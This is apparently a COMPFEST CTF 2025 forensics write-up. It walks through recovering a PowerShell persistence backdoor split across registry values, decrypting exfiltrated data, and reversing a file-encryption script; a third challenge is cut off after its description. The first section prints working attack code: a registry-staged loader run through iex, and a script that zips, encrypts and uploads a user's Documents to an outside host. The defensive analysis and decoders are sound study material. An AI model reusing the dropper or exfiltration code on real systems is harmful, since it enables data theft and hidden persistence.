COMPFEST CTF 2025


Aristore

Forensics

Meowrine Corp

Challenge

A hacker recently got access to the computer of a high-ranking admiral of the meowrine corp. We managed to kick him out and made sure nothing was stolen. However something weird has been going on over our network now. We suspect it is related to the recent hack so to help you, I've given you the logs during the hack and the network capture. Can you trace back the events that happened?

Solution

Traffic analysis reveals that a large amount of data was uploaded from 192.168.18.84 to 192.168.18.76. This could be information exfiltrated by the attacker.

Investigating the logs, critical information was found in Microsoft-Windows-PowerShell%4Operational.evtx. This channel holds PowerShell script block logging, which records the text of every script block as PowerShell compiles it, so commands that were only ever decoded in memory still end up in the log.

A persistence backdoor was discovered in Event ID 20:

$script = '$k=@("HKCU:\Environment","HKCU:\Console","HKCU:\Keyboard Layout","HKCU:\Control Panel\Desktop","HKCU:\Control Panel\Accessibility");$n=@("boot","update","load","install","exec");$s="";0..4|%{$s+=Get-ItemPropertyValue -Path $k[$_] -Name $n[$_]};iex ([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($s)))';

$p = "C:\Users\Whiskerstein\AppData\Local\Packages\MicrosoftTeams_8wekyb3d8bbwe\LocalCache\Microsoft\MSTeams\EBWebView\Default";

$f = Join-Path $p "restart.ps1";

if(-not(Test-Path $p)){New-Item -ItemType Directory -Path $p -Force|Out-Null};

Set-Content -Path $f -Value $script -Encoding UTF8
  1. Creating the Backdoor Script File:

    • $p = "C:\Users\Whiskerstein\...": Defines a seemingly normal path, hiding the malicious file within a legitimate application’s folder to evade detection.
    • $f = Join-Path $p "restart.ps1": Defines the backdoor script’s filename as restart.ps1.
    • if(-not(Test-Path...)){New-Item...}: Checks if the path exists, and creates it if it doesn’t.
    • Set-Content -Path $f -Value $script...: Writes the string content from the $script variable into the C:\...\restart.ps1 file.
  2. Backdoor Script Logic (the $script variable):

    • $k=@("HKCU:\Environment", ...): Defines an array containing five registry paths.
    • $n=@("boot","update","load","install","exec"): Defines an array containing five registry value names.
    • $s="";0..4|%{$s+=Get-ItemPropertyValue ...}:
      • Reads the value of boot from HKCU:\Environment
      • Reads the value of update from HKCU:\Console
      • Reads the value of load from HKCU:\Keyboard Layout
      • Reads the value of install from HKCU:\Control Panel\Desktop
      • Reads the value of exec from HKCU:\Control Panel\Accessibility
      • Then, it concatenates these five retrieved values into a single long string, $s.
    • iex ([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($s))):
      • [Convert]::FromBase64String($s): Decodes the concatenated string $s from Base64.
      • [Text.Encoding]::UTF8.GetString(...): Converts the decoded bytes back into a UTF8 string.
      • iex: (Invoke-Expression) Executes this string.

Instead of writing the full malicious code directly into the .ps1 file, the attacker Base64-encoded the payload, split it into five parts, and hid each part in five different, seemingly harmless registry values.

Next, while examining the rest of the logs, traces of the attacker using PowerShell to write malicious content to the registry were found:

  1. boot (from Event ID 14)
New-ItemProperty -Path "HKCU:\Environment" -Name "boot" -Value "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" -PropertyType String -Force
  2. update (from Event ID 10)
New-ItemProperty -Path "HKCU:\Console" -Name "update" -Value "BTnhjZ0dEOHBOeWduRnpnYUpEazBGUWtwTjE4M09RdGZEaGNnSGpRcEl6VW5LU0lhSkRralhqY1hOQnMwQnpWWU5BY2pIejg1TjFrM0tUUllQQ2szWENRcElCZ25CeVJkRGhjZ0RBa0hOeFUwQnljYU9Da2dDQ2NwSTFzMEZ3NEFOeWtpQVRRcEl4Z0pLUWxjTkNrM0FUOHBOeGNrT1NBYUpBY2dDU2NwSTFRM0tTSVZOQWMzSnpjWE5CazBLU0lhRGpralBBa0hOMFlrRnc0YUlDa2lGU0FwSUFrak9TTlpJRGswWHlNSEl4b2pPU1JlSURrM1ZTY3BJaHdnT1NFVklEazNDQ2NwSWxzaktRbGZJRGtnSmlNNU53Y2tLVGdVSURraU9pTTVJQWtqQnowQUp3YzNIU1E1TkFJaktTY2FEaWtqV0E0cEl3UU9PVHBaTkFjZ0JpUXBJRmdrS1F4WU5BY2dYdzQ1SXhjNEZ3Z0dKeWtnSHljSElCd0pLVDFlRGpraUFqUUhORDhqRnpSY05Ea2pSZzQ1TndNM0Z6aFlOQ2tqUGdrNU56YzNLUXdBTnhjZ0t6ODVJam9KS1NZSE55a2pEQWs1TndRM0J5ZGNOQmMwWERRNUlsazNCemtYT0NrZ0J5YzVOeGcwS1E4QU56a2lCamNwSTFVSkJ3Z1hORGtnWEQ4SElCc0pPU0FBTndjZ1d3a0hJQ29KS1RSY1BDazNYaVFwSUY0a0tRNWNOQmNnR1RRSElBZ0pCd2tBTndjakNUOHBOeWduT1NRYUpEazBYalFITkFvM0J5TmRORGtnUGpjcEl3ODNGd2tYRGprM05UY0hJd1UzS1RSZEpDa2dIeWNwTnlJM0Z6VmNOQ2tqSVFrNUlsODhPU0lHSnpralh6UUhJeWtKT1QwQU55azNSamM1SXljM0Z6a1VPQWMwRnlBNUlrSWtGd2dYRGprakJUUXBJeThKS1RkWURnY2dPVDhwSXgwMEZ3NWNORGszUERjNUlqbzNGeUlVTkNrM0FEY0hOeXczQnpnWE5Da2pYaVFYTkNBbktUc0ZDU2szRHpjSEl3Y0pCeVFYTkNralZTY3BJZ1VuT1NBWERqa2pMemNwSXpvSk9UbFlEZ2NnRGo4WE5DQTNCemtITnprZ1d6dzVJeGszQnpWZERqa2lHRFFISUJrT0J5ZGVPRGswQWlNNU5Da2pGd2dHT3prakN6Y1hORjgwT1FoWU5BY2pGRHc1TndrbktUY0FQemtpWFQ4NU4xb2tPVDhHTnpralhEY3BJd1FPRno4WERqa2lBQTRYSUZ3N0tUUUVPd2MwV1NBNUlCUTNCelFHTnlrakNEY3BJd1VrT1FnRUp3Y2dGelFwSWxVM09TRmVORGtnSHpRSElGNDNCenRlTkRrZ0ZUUXBJeFFuT1RVRUp3YzNYemNISUFZSk9UdGNOQWMzR2pRNUlBd0pPU0FhRGlraldpUXBOMXNqS1RzWERqa2pYalFwSXlzSk9UeFlEZ2NnWFQ4cEl3bzNPVDVjTkRrM0FqUTVJaVEzT1NNVU5DazNIelFITngwME9UNFhOQ2tqR1NRSE5DY2pGeVpZSkNraUhTUTVJeDAwT1RRWERnYzNIemNwSUFjSkJ3NFhEamtpQmpRcEl3WThCendCSnhjZ0ZRazVJQmszRnc4Vk5EazNORGNISXdFMEJ5Y1ZOQ2szUmpRcEl6VTNCeVJkSkFjMEJDQTVJbHNrRno5Wk5Da2pBUWtYSXlRM09RZ0JOemtqWGpjWE5GUS9CeUlCSnhjZ0h3azVOMXcwQnljRU54YzBXRFE1SURjM0J3OEJOd2NqQXpjcEkxUTNCenBkSkJjMEFTUXBJRHNqRndrSEp4Y2dCZ2s1TnowM09UUUVOeGMwRGpjNUlDbzNGem9CTndjalZEY3BJeGcwS
1NOZEpDa2lIU2NITkZrM0Z3a1hOQWMzSFRRWE5CVTNPVDhVUEJjMENUYzVJQ2MzRnprQk56a2lIVGNISXhvL0J6OEdOd2NnV3c0SE53QTNCeU5mTkJjZ1h3NDVOMTQzQnd3Vk5BY2dSZ2twSXhzNEZ6Y0JKd2NnSVFrSE56dzNPVHBkRGlrZ1ZBNDVJaHdPS1R3VURoY2dBalE1TndBMEJ3NWNOQ2tqQnljcE55UWpGeUFVTkNraUJEUVhJeDgwQnowVk5BY2dWRGNYSXhjMEJ3a1ZOQ2tqWGljSE5Ca2dLU1pZSkRrMEF6Y0hOQ2szQnpWZE5Ea2dBemNwSXdJM09Ud1hEamszQVRjSEkxczNGd2xkSkNraVhDY1hJQVFPRnlOY05Da2pIUWs1SWlNSk9RNFVQQmMwTHpjWE5EZzNLUThWUE" -PropertyType String -Force
  3. load (from Event ID 16)
New-ItemProperty -Path "HKCU:\Keyboard Layout" -Name "load" -Value "NralZEUTVJQUkwT1F0Y05BY2dCRHM1TkE0akJ6c0ZJeWszQURnNUkxODNGenNITnpraU5UY0hJd2cvS1NZQkp3YzNDajg1SWhrOEJ5UUJKeWszQlRRNUl4MDNLVHRkRGhjZ09BazVJZ0lKS1FzWE9BYzBBRGdwTnhzakZ6c1hEamszWHpjSE5CYzNLVDBITnprZ0FUUTVOMXMwQnpSZk5Da2pLRGNwSXdBbkZ6NEVJemtpT3ljcElsc2tPVDBVRGdjM1JqUXBJMVVKQnc4YURqa2lId2tISUNnSkJ3c1hORGszWGpRNUl5dy9PVHhjTkNrakhnazVJQmMwRnpwY05BY2dPZ2tYSUVZL0Z5UUJKeGNnV1E0NUlCazNCeWNWTkRrM0tqY0hJd1EzS1RjVk5DazNJemNwSTFvMEtUVmRKQ2szSGlNSElCNEpPVDBBTnlrak9Ba3BJQm9KQnpsWURnY2dCQWtYSUZvME9RZ0JOemtqRkRRcEl4b25GemdFSXprZ09UY3BOeWczQndsZE5Da2pRaVFwTnl3akZ6UmZPRGtpVlQ4NU53b25GeU1YRGprZ0dEUTVJQTQzS1E0Qk53Y2pYalE1SUZzMEZ6b0dOeWtqSERRcEkxMG5GejhFSXdjM0d6UUhJRndKS1QxY05BYzNJemM1SUFBSktUb2FEaWtqWFNRcE53QWpGd3hZRGprakhUUUhORHcvQnc0Qkp4Y2dCZ2s1SURrM0J5SVZORGszRHpjSEkxazNPUWtWTkNrM1ZEY3BJejAzT1NaZEpBYzBPU001SWtZa0tRaFpKRGtqRnpRcEl3SU9CemdWTkRrakJUUUhJQThKS1NNWFBEazBXaUE1TkFNak9Ud0dPeGNnT0FrNUkxVTNGd2tWUERrM1JpUTVJaXNKRnpSWk5Da2dYUWs1SUFJM0Z6VVVEaGNqQWpjSE56UTNPVGxkRGlrZ0pnazVJZ1FPT1RRVURoY2dIVDg1Tnh3bkJ3aFlEaWtqR3drNUloazBGd3dVRGprald3NFhJRGMzQnlCY05CY2dGVGc1Tnlrbk9UUUdOemtqQlRRcEl3VUpGeUFYRGpraUtRa1hJQ003S1NjRU95azNPQ01YSUFVSktUb1ZORGtnQlRRNU54ZzNPVHRmTkRrZ0NqY3BOeGMzS1R4ZE5Da2pCQ2NITkFVZ0J6aFlKQ2tpQkNRNUl3azNGejhYRGdjM0JqUXBJQmNPT1NJWERqa2lDVGNwSXpjL0tTTUJKeWszQ3pjcEl3WTNCejFmTkJjZ0dna0hJeW8zQnpnRkNTa2pIU2NITkFJZ09UUllKRGtnQnpjcE54ZzBGdzlkTkNralJpUXBJaGtuRnlJWERqa2pBVGNwSXlnSktTZFlEZ2NnRkQ4cEkxc0pPVDFjTkJjaldUODVOMW9rQnlZR055a2pXVFFISXdVMEtROFhEZ2NqSGpRNU5Ca0pPU0pkSkFjME9pTTVJaGduRnpnQU53Y2dGUTQ1SXg0M0J3a0FOemtnV2drcElEb0pLUWxkSkNraUlTY1hJQ0VKRnlOY05Da2pEZ2s1SWc0SkJ5SVVQQ2tqQUE0NUl4ZzBCejllUERrM1h5UXBOeFUzT1RsZE5BY2pEemNYSUJ3T0Z3aGZORGswV0FrcEl4c25Cd2tFSXpraUlDY3BJa0lrS1RWY05Da2pSZ2s1SURvM0tUMWNOQWNnR1FrWElBYzhGdzRGSXprMEZ5TXBOelE3Rno4VURqa2pXalFwSXdVM0J3bFlOQWNqQUFrSE54MDNLVDBVRGlrZ1ZEZzVJMXMwQnc0WE5Ea2lWRFFISXhvT09TWVVEamtqSHpRWElGNDdPVG9BTnlrakhBNHBJQVVKS1Q5WURnY2dKd2tYSUJnOE9TQmVQRGszUGo4SElBVTdPVG9CSnpraUtna3BJaj
gzRnprYURqa2dWVFFISUJnT0J5TmVOQWMzQURjcEl5Z0pGemNhRGpraUhnNEhJQlFKT1FzWFBEazNHU1E1SWxVSk9UdGREamtpRERjSElCa09GejljRGhjZ0pEYzVJejQzQndzWE9EazNHQ1FwTngwM0Z3eGNOQ2tqQkE0WElGa0pCd2hZRGhjZ0l6c0hORlU0S1RrR0l5azNHelFwSTFrM0tRNWZOQmNnVlFrSEl5NDNPU0lGQ1NraldDY0hOQ3dqS1NkZklEa2dPeU1wSUFrbkJ6UUdPd2MwWFRnNUl3NDNLVFJkRGpraVJnNEhJRGczS1R3YUpDa2pWUTRYSUN3M0J5SmNORGswWERRSElCVTNLVDhBUHlrM0FDY1hJeThKQnpsY05EazNIVDhwTnlRak9UZ1ZOQ2szRlRjcEl6czNGd2xkSkFj" -PropertyType String -Force
  4. install (from Event ID 12)
New-ItemProperty -Path "HKCU:\Control Panel\Desktop" -Name "install" -Value "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" -PropertyType String -Force
  5. exec (from Event ID 18)
New-ItemProperty -Path "HKCU:\Control Panel\Accessibility" -Name "exec" -Value "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" -PropertyType String -Force

Concatenating the values in the order boot -> update -> load -> install -> exec and then Base64-decoding the result yields:

$x=109;$c='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';$xd=[System.Convert]::FromBase64String($c);$rd='';foreach($b in $xd){$rd+=[char]($b -bxor $x)};iex $rd

With the Base64 blob elided, the stub is a single XOR layer keyed with 109 whose output is again fed to iex:

$x=109;$c='...';$xd=[System.Convert]::FromBase64String($c);$rd='';foreach($b in $xd){$rd+=[char]($b -bxor $x)};iex $rd

By changing the iex at the end to Write-Host, we can make the script output the decrypted result:

$x=109;$c='...';$xd=[System.Convert]::FromBase64String($c);$rd='';foreach($b in $xd){$rd+=[char]($b -bxor $x)};Write-Host $rd

Running it gives:

$r ='...' | iex

By removing the | iex part layer by layer and re-running the script, we eventually deobfuscate it to the final layer:

$AAAAAAAAAAAAAABBBBBIIIiiAB='0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz!@#$%^&()_+-=[]{}~';$aadsfjkh=-join((1..15)|ForEach{$AAAAAAAAAAAAAABBBBBIIIiiAB[(Get-Random -Maximum $AAAAAAAAAAAAAABBBBBIIIiiAB.Length)]});$fnsdadkj="$env:TEMP\$aadsfjkh.zip";$cvmz="$env:TEMP\$aadsfjkh.enc";try{Get-ChildItem "$env:USERPROFILE\Documents" -Recurse -File|Where-Object{-not $_.PSIsContainer -and $_.Name -notlike "*transcript*" -and $_.Name -notlike "*.tmp"}|Compress-Archive -DestinationPath $fnsdadkj -CompressionLevel Fastest -ErrorAction SilentlyContinue;if(Test-Path $fnsdadkj){$pqoero=New-Object byte[] 16;$dma=New-Object byte[] 16;$zfsfdm=[System.Security.Cryptography.RNGCryptoServiceProvider]::Create();$zfsfdm.GetBytes($pqoero);$zfsfdm.GetBytes($dma);$zfsfdm.Dispose();$dmafnaas=[System.Security.Cryptography.Aes]::Create();$dmafnaas.Key=$pqoero;$dmafnaas.IV=$dma;$encryptor=$dmafnaas.CreateEncryptor();$dfnalkns=[System.IO.File]::ReadAllBytes($fnsdadkj);$agbaghb=$encryptor.TransformFinalBlock($dfnalkns,0,$dfnalkns.Length);$dmafnaas.Dispose();$combinedBytes=$pqoero+$agbaghb+$dma;[System.IO.File]::WriteAllBytes($cvmz,$combinedBytes);Remove-Item $fnsdadkj -Force -ErrorAction SilentlyContinue;iwr -Uri "http://192.168.18.76:8080/upload" -Method Post -InFile $cvmz -ContentType "application/octet-stream" -Headers @{"X-Filename"=(Split-Path $cvmz -Leaf)} -ErrorAction SilentlyContinue|Out-Null;if(Test-Path $cvmz){Remove-Item $cvmz -Force -ErrorAction SilentlyContinue}}}catch{}
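The two outer layers above (five registry fragments joined and Base64-decoded, then a `$x=109` XOR stub) can be peeled without ever handing the text to `iex`. The following is an added example, not the writeup's code or the attacker's: it rebuilds the same layering on a constructed stand-in payload (the real registry values are elided on the page), pulls the `-Value` strings back out of `New-ItemProperty` lines in the shape logged in the .evtx, reassembles them in the `$n` order and decodes both layers statically. `INNER_SCRIPT`, the regexes and the helper names are assumptions made for the example.

```python
import base64
import re

# Added example (not the writeup's code). It rebuilds the dropper's two outer
# layers on a constructed payload so the decoder can be exercised offline; the
# real registry values are elided on the page.

XOR_KEY = 109  # $x=109 in the stage-2 stub recovered from the registry
ORDER = ["boot", "update", "load", "install", "exec"]  # the $n array: the reassembly order
PATHS = ["HKCU:\\Environment", "HKCU:\\Console", "HKCU:\\Keyboard Layout",
         "HKCU:\\Control Panel\\Desktop", "HKCU:\\Control Panel\\Accessibility"]

# Constructed, harmless stand-in for the innermost script.
INNER_SCRIPT = 'Write-Output "stage-3 collector would run here"'

NEW_ITEM_RE = re.compile(
    r'New-ItemProperty\s+-Path\s+"([^"]+)"\s+-Name\s+"([^"]+)"\s+-Value\s+"([^"]*)"')
STUB_RE = re.compile(r"\$x=(\d+);\$c='([A-Za-z0-9+/=]+)'")


def build_staged_payload(inner: str) -> list[str]:
    """Re-create the layering: XOR every byte with XOR_KEY, base64 it and wrap it in
    the $x/$c/iex stub (layer 2); base64 the stub and split it into one fragment per
    registry value (layer 1)."""
    xored = bytes(b ^ XOR_KEY for b in inner.encode("utf-8"))
    stub = ("$x=%d;$c='%s';$xd=[System.Convert]::FromBase64String($c);$rd='';"
            "foreach($b in $xd){$rd+=[char]($b -bxor $x)};iex $rd"
            % (XOR_KEY, base64.b64encode(xored).decode("ascii")))
    outer = base64.b64encode(stub.encode("utf-8")).decode("ascii")
    step = -(-len(outer) // len(ORDER))  # ceiling division: at most len(ORDER) pieces
    return [outer[i:i + step] for i in range(0, len(outer), step)]


def make_log_lines(fragments: list[str]) -> list[str]:
    """Constructed script-block log lines in the shape seen in the .evtx, emitted in
    reverse so it is obvious that $n, not the log order, fixes the reassembly."""
    if len(fragments) != len(ORDER):
        raise ValueError("expected one fragment per registry value")
    lines = [f'New-ItemProperty -Path "{p}" -Name "{n}" -Value "{v}" -PropertyType String -Force'
             for p, n, v in zip(PATHS, ORDER, fragments)]
    return lines[::-1]


def fragments_from_log(lines) -> list[str]:
    """Pull the five -Value strings out of logged New-ItemProperty commands, keyed by -Name."""
    found = {}
    for line in lines:
        m = NEW_ITEM_RE.search(line)
        if m:
            found[m.group(2)] = m.group(3)
    missing = [n for n in ORDER if n not in found]
    if missing:
        raise ValueError(f"registry fragments not found in log: {missing}")
    return [found[n] for n in ORDER]


def decode_stage1(fragments) -> str:
    """restart.ps1's work: concatenate boot..exec and base64-decode. Returns the stub text."""
    return base64.b64decode("".join(fragments)).decode("utf-8")


def decode_stage2(stub: str) -> str:
    """Parse $x and $c out of the stub and undo the XOR, instead of letting iex run it."""
    m = STUB_RE.search(stub)
    if m is None:
        raise ValueError("stub does not match the $x=N;$c='...' layout")
    key = int(m.group(1))
    blob = base64.b64decode(m.group(2))
    return bytes(b ^ key for b in blob).decode("utf-8")


def peel(lines) -> str:
    """Log lines in, next-layer PowerShell out, with nothing executed."""
    return decode_stage2(decode_stage1(fragments_from_log(lines)))


if __name__ == "__main__":
    demo = make_log_lines(build_staged_payload(INNER_SCRIPT))
    print(peel(demo))
```

On the real log the same `fragments_from_log` call works on the five `New-ItemProperty` lines quoted above; what comes out of `peel` is the `$r='...' | iex` layer, which is plain string manipulation that still needs PowerShell (with `iex` swapped for `Write-Output`) to unwrap further, as the writeup does.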

The POST body sent to http://192.168.18.76:8080/upload can be carved from the traffic capture; that is the .enc file, laid out by the script above as key, ciphertext, IV.

We can write a Python script to recover this file:

  1. Read the .enc file.
  2. Split the file into three parts: the first 16 bytes are the Key, the last 16 bytes are the Initialization Vector (IV), and the middle part is the encrypted data.
  3. Use the extracted Key and IV to decrypt the data with AES-CBC (the mode System.Security.Cryptography.Aes uses by default; its default padding is PKCS7).
  4. Remove the padding from the end of the decrypted data.
  5. Save the final plaintext data as a .zip file.
from Crypto.Cipher import AES
from Crypto.Util.Padding import unpad
import sys

# --- Configuration ---
encrypted_file_path = "upload"        # POST body carved from the capture
decrypted_zip_path = "decrypted.zip"
# ---------------------

def decrypt_file():
    """Reads the .enc file, extracts Key/IV, decrypts, and saves the original .zip file."""

    print(f"[*] Reading the encrypted file: '{encrypted_file_path}'")

    with open(encrypted_file_path, "rb") as f:
        full_data = f.read()

    # Step 1: Extract the Key, IV, and Ciphertext from the file structure
    # (the dropper wrote key + ciphertext + IV)
    key = full_data[:16]
    iv = full_data[-16:]
    ciphertext = full_data[16:-16]

    print("[+] File components extracted successfully.")
    print(f" -> AES Key (HEX): {key.hex()}")
    print(f" -> AES IV (HEX): {iv.hex()}")

    try:
        # Step 2: Create an AES cipher object in CBC mode (the .NET Aes default)
        cipher = AES.new(key, AES.MODE_CBC, iv)

        # Step 3: Decrypt the ciphertext and unpad it (PKCS7 padding is the .NET default)
        decrypted_padded_data = cipher.decrypt(ciphertext)
        original_data = unpad(decrypted_padded_data, AES.block_size)

    except Exception as e:
        print(f"\n[!] An unexpected error occurred during decryption: {e}")
        sys.exit(1)

    # Step 4: Save the decrypted bytes to a .zip file
    with open(decrypted_zip_path, "wb") as f:
        f.write(original_data)

if __name__ == "__main__":
    decrypt_file()

After decompressing the zip file, the flag is found inside a PDF file.

FLAG

1
COMPFEST17{powershell_script_logging_is_very_powerfull_b4ffdc5da5}

crash out

Challenge

Evan installed and executed a supposedly safe file. It caused his laptop to hang, some data to become corrupted, and new password-protected files to show up. The password popped up for a while, but I didn't memorize it. Can you get me back my file?

Solution

First, I mounted the image using FTK as the F drive.

I started by finding a genuinely encrypted zip file at F:\Users\Evan\Documents\89a0b289f0221.zip, but I couldn’t figure out the password.

Then, I located the file F:\Users\Evan\Downloads\upload_queue\file.enc. The strange thing about this file was that its header was that of a JPG, but it couldn’t be opened correctly after changing the extension to .jpg. This led me to suspect it was encrypted.

Next, I found a suspicious file: F:\ProgramData\Dumps\chrome_updater.exe.34368.dmp. Attempting to open it with WinDbg resulted in an error, so I resorted to analyzing the strings within it.

Searching for 89a0b289f0221.zip or file.enc inside the dump led me to this line:

COMPFEST17-1

1
C:\\Users\\Evan\\Documents\\89a0b289f0221.zip whereourcrashis --flag= --crash= null div raise --wait= --path= C:\\Users\\Evan\\Downloads\\upload_queue\\file.enc chrome_updater.exe
  1. chrome_updater.exe: This is the executed program. Based on its name, it’s likely an updater for a Chromium-based application, which fits the challenge description of a “supposedly safe file”.
  2. --crash= null div raise: This parameter explicitly instructs the program to perform an operation that will cause a crash.
    • null: Likely represents a “null pointer dereference”.
    • div: Likely represents a “division-by-zero error”.
    • raise: Likely represents “throwing an exception”.
  3. whereourcrashis: This string is very colloquial, like a comment left by a developer. This ties into the theme of the challenge, not only confirming that this file is essential to the solution but also suggesting that the string itself will be very useful later.

I then tried to find chrome_updater.exe for reverse engineering but couldn’t locate it. However, during the search, I found a related Windows Error Reporting (WER) file: F:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_chrome_updater.e_7b71673944fedcfebbd880da83474929a7d18741_38b31a53_7dfb28da-126b-49f8-a06-216c4072ac0a\Report.wer. It contained the following content:

EventType=APPCRASH
...
Sig[6].Name=Exception Code
Sig[6].Value=c0000005
...
  1. EventType=APPCRASH: The event type is an application crash.
  2. Sig[6].Name=Exception Code; Sig[6].Value=c0000005: c0000005 is STATUS_ACCESS_VIOLATION, the Windows exception code for an access violation. The most common cause is a null pointer dereference, that is, the program attempted to read from or write to an address at or near NULL.

This matched my earlier speculation, confirming that chrome_updater.exe, 89a0b289f0221.zip, and file.enc are highly relevant files for this challenge. The meaningful string whereourcrashis from the command line is also very likely related.

Connecting the dots—I couldn’t find the password for 89a0b289f0221.zip, and the string whereourcrashis appeared right next to the zip file in the command—it was reasonable to infer that whereourcrashis was the password for 89a0b289f0221.zip. Trying it confirmed this suspicion.

After decompressing 89a0b289f0221.zip, I obtained a script for file encryption named script.py, with the following content:

import sys
import hashlib
import getpass

HEADER_SIZE = 16
def derive_key(password: str, length: int = 32) -> bytes:
    return hashlib.sha256(password.encode()).digest()[:length]

def transform(byte, key_byte, i):
    xored = byte ^ key_byte
    rotation = i % 3
    return ((xored << rotation) | (xored >> (8 - rotation))) & 0xFF

def encrypt(input_file, output_file, password):
    key = derive_key(password)

    with open(input_file, 'rb') as f:
        data = f.read()

    encrypted = bytearray(data[:HEADER_SIZE])

    for i, byte in enumerate(data[HEADER_SIZE:], start=HEADER_SIZE):
        key_byte = key[i % len(key)] ^ (i & 0x0F)
        encrypted.append(transform(byte, key_byte, i))

    with open(output_file, 'wb') as f:
        f.write(encrypted)

    print(f"Encrypted {input_file} -> {output_file}")

if __name__ == "__main__":
    if len(sys.argv) != 4:
        print("Usage:")
        print("python3 script.py encrypt input.jpg output.enc")
        sys.exit(1)

    mode, input_file, output_file = sys.argv[1:4]
    password = getpass.getpass("Enter password: ")

    if mode == "encrypt":
        encrypt(input_file, output_file, password)
    else:
        print("Invalid")

I noticed the usage example was python3 script.py encrypt input.jpg output.enc. Considering the file.enc I had found, it was highly probable that it was encrypted by this very script. Therefore, I wrote a corresponding decryption script:

import sys
import hashlib
import getpass

HEADER_SIZE = 16

def derive_key(password: str, length: int = 32) -> bytes:
    """Key derivation identical to the encryption script."""
    return hashlib.sha256(password.encode()).digest()[:length]

def untransform(byte, key_byte, i):
    """
    Inverse of transform:
    1. Compute the rotation count.
    2. Rotate right (ROR), the inverse of the rotate left (ROL).
    3. XOR, which is its own inverse.
    """
    rotation = i % 3
    # rotate right (ROR)
    rotated_byte = ((byte >> rotation) | (byte << (8 - rotation))) & 0xFF
    # XOR
    original_byte = rotated_byte ^ key_byte
    return original_byte

def decrypt(input_file, output_file, password):
    key = derive_key(password)

    with open(input_file, 'rb') as f:
        data = f.read()

    # The first 16 header bytes are plaintext; copy them verbatim
    decrypted = bytearray(data[:HEADER_SIZE])

    # Decrypt from the 17th byte (index 16) onward
    for i, byte in enumerate(data[HEADER_SIZE:], start=HEADER_SIZE):
        # 1. Derive exactly the same key_byte as during encryption
        key_byte = key[i % len(key)] ^ (i & 0x0F)

        # 2. Apply the inverse transform
        decrypted_byte = untransform(byte, key_byte, i)
        decrypted.append(decrypted_byte)

    with open(output_file, 'wb') as f:
        f.write(decrypted)

    print(f"Decrypted {input_file} -> {output_file}")

if __name__ == "__main__":
    if len(sys.argv) != 4:
        print("Usage:")
        print("python3 script.py decrypt input.enc output.jpg")
        sys.exit(1)

    mode, input_file, output_file = sys.argv[1:4]
    password = getpass.getpass("Enter password: ")

    if mode == "decrypt":
        decrypt(input_file, output_file, password)
    else:
        print("Invalid mode. Use 'decrypt'.")

Both encryption and decryption require a password. So far, the only password-like string I had encountered was whereourcrashis. I used it to decrypt file.enc, and as expected, it successfully decrypted into a JPG image.
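Guessing the password and eyeballing the output works once, but the scheme gives a cheaper check: the 16-byte header is left in the clear, every other byte depends only on its own offset and the key (no chaining), and a JPEG always ends with the FF D9 end-of-image marker. Decrypting just the last two bytes therefore tells you whether a candidate password is right. The block below is an added example, not the challenge's script.py or the writeup's decryptor; it re-implements the same transform, encrypts a constructed JPEG-like buffer (labelled as such) and tests candidates against the trailer. The `marker` parameter generalises the check to any format with a fixed trailer.

```python
import hashlib

# Added example (not the writeup's code). Re-implements the scheme from script.py
# and adds a candidate-password check that uses the JPEG end-of-image marker.

HEADER_SIZE = 16          # first 16 bytes are stored in the clear (see script.py)
JPEG_EOI = b"\xff\xd9"    # every well-formed JPEG ends with this marker


def derive_key(password: str, length: int = 32) -> bytes:
    return hashlib.sha256(password.encode()).digest()[:length]


def rol8(b: int, r: int) -> int:
    return ((b << r) | (b >> (8 - r))) & 0xFF


def ror8(b: int, r: int) -> int:
    return ((b >> r) | (b << (8 - r))) & 0xFF


def key_byte_at(key: bytes, i: int) -> int:
    # same per-position tweak as script.py: key byte XOR low nibble of the offset
    return key[i % len(key)] ^ (i & 0x0F)


def encrypt_bytes(data: bytes, password: str) -> bytes:
    key = derive_key(password)
    out = bytearray(data[:HEADER_SIZE])
    for i in range(HEADER_SIZE, len(data)):
        out.append(rol8(data[i] ^ key_byte_at(key, i), i % 3))
    return bytes(out)


def decrypt_bytes(data: bytes, password: str) -> bytes:
    key = derive_key(password)
    out = bytearray(data[:HEADER_SIZE])
    for i in range(HEADER_SIZE, len(data)):
        out.append(ror8(data[i], i % 3) ^ key_byte_at(key, i))
    return bytes(out)


def trailer_matches(enc: bytes, password: str, marker: bytes = JPEG_EOI) -> bool:
    """Cheap password test. The scheme has no chaining, so each byte depends only on its
    offset and the key: decrypting just the last len(marker) bytes is enough to see
    whether the expected trailer appears."""
    start = len(enc) - len(marker)
    if start < HEADER_SIZE:
        return False
    key = derive_key(password)
    tail = bytes(ror8(enc[i], i % 3) ^ key_byte_at(key, i) for i in range(start, len(enc)))
    return tail == marker


def find_password(enc: bytes, candidates, marker: bytes = JPEG_EOI):
    """Return the first candidate whose decryption ends in the expected marker, else None."""
    for cand in candidates:
        if trailer_matches(enc, cand, marker):
            return cand
    return None


# Constructed stand-in for the photo: a JPEG-like 16-byte header, some body bytes, then FF D9.
SAMPLE_JPEG = (b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01\x01\x00\x00\x01"
               + bytes(range(200)) + JPEG_EOI)


if __name__ == "__main__":
    enc = encrypt_bytes(SAMPLE_JPEG, "whereourcrashis")
    print(find_password(enc, ["password", "chrome_updater", "whereourcrashis"]))
    assert decrypt_bytes(enc, "whereourcrashis") == SAMPLE_JPEG
```

Because the header is copied verbatim, the JPEG magic at the start of file.enc says nothing about the password; only the trailer (or a structural parse of the decrypted body) does.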

There was only the image with no other information, so I suspected steganography. While checking the image’s EXIF information, I found a clue:

Exif Image Width  : 1080
Exif Image Height : 1080

The EXIF information indicated the image dimensions were 1080x1080, but the image actually rendered at 1080x1024, i.e. the height in the JPEG frame header (SOF) was smaller than the height recorded in EXIF. Restoring the frame-header height to 1080 made the hidden rows visible, and the flag was revealed at the bottom of the image.

FLAG

1
COMPFEST17{cr4sh1ng_1nt0_th3_v0001d_b00m_boOm_B00M!!_b51a77934b}

Mr & Mrs Smith

Challenge

A couple in our office has been rather suspicious these past few weeks, though I can't do much as the guy's father holds an authoritative position. A few days ago he asked me to help back up his phone, and I managed to keep some information just in case I find something to prove my suspicions. Hmm, what does he usually do with his phone?

Chall: https://drive.google.com/drive/folders/1mM3LckA_NZ5O-NskteQOE_8V-R7_g-Dk?usp=sharing

